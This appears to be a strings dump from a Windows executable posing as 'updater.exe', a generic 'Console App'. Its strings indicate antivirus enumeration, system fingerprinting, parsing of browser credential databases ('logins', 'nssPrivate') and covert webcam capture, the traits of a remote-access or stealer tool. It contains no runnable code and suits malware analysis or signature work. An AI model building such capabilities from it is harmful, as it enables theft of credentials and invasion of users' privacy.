SELECT * FROM AntiVirusProduct
displayName
No Antivirus
select * from win32_processor
Win32_VideoController
Caption
Microsoft
SQLite format 3
Not a valid SQLite 3 Database File
Auto-vacuum capable database is not supported
UNIQUE
HandleGetWebcam
ReturnCamImage
HandleDoWebcamStop
metaData
nssPrivate
ObjLists
ComputeHash
Resize
logins
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Console App
FileVersion
1.0.0.0
InternalName
updater.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
updater.exe
ProductName
Console App
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0